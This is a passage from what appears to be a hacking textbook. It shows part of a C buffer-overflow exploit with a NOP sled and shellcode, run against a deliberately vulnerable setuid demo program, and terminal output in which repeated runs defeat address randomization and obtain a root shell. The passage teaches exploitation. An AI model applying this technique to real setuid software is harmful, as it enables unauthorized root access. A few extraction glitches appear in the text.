Graphics Programs Reference
In-Depth Information
for(i=0; i < 90; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
memset(buffer+84, 0x90, 900); // Build NOP sled.
memcpy(buffer+900, shellcode, sizeof(shellcode));
execl("./aslr_demo", "aslr_demo", buffer, NULL);
}
This code should make sense to you. The value
200
is added to the return
address to skip over the first 90 bytes used for the overwrite, so execution lands
somewhere in the NOP sled.
reader@hacking:~/booksrc $ sudo chown root ./aslr_demo
reader@hacking:~/booksrc $ sudo chmod u+s ./aslr_demo
reader@hacking:~/booksrc $ gcc aslr_execl_exploit.c
reader@hacking:~/booksrc $ ./a.out
i is at 0xbfa3f26c
ret addr is 0xb79f6de4
buffer is at 0xbfa3ee80
Segmentation fault
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfa3f26c - 0xbfa3ee80"
$1 = 1004
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfe9b6cc
ret addr is 0xbfe9b3a8
buffer is at 0xbfe9b2e0
sh-3.2# exit
exit
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfb5a38c
ret addr is 0xbfb5a068
buffer is at 0xbfb20760
Segmentation fault
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfb5a38c - 0xbfb20760"
$1 = 236588
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfce050c
ret addr is 0xbfce01e8
buffer is at 0xbfce0130
sh-3.2# whoami
root
s
h-3.2#
As you can see, occasionally the randomization causes the exploit to fail,
but it only needs to succeed once. This leverages the fact that we can try the
exploit as many times as we want. The same technique will work with the note-
search exploit while ASLR is running. Try writing an exploit to do this.
Once the basic concepts of exploiting programs are understood, countless
variations are possible with a little bit of creativity. Since the rules of a program
are defined by its creators, exploiting a supposedly secure program is simply a
matter of beating them at their own game. New clever methods, such as stack
guards and IDSs, try to compensate for these problems, but these solutions
aren't perfect either. A hacker's ingenuity tends to find holes in these systems.
Just think of the things they didn't think of.
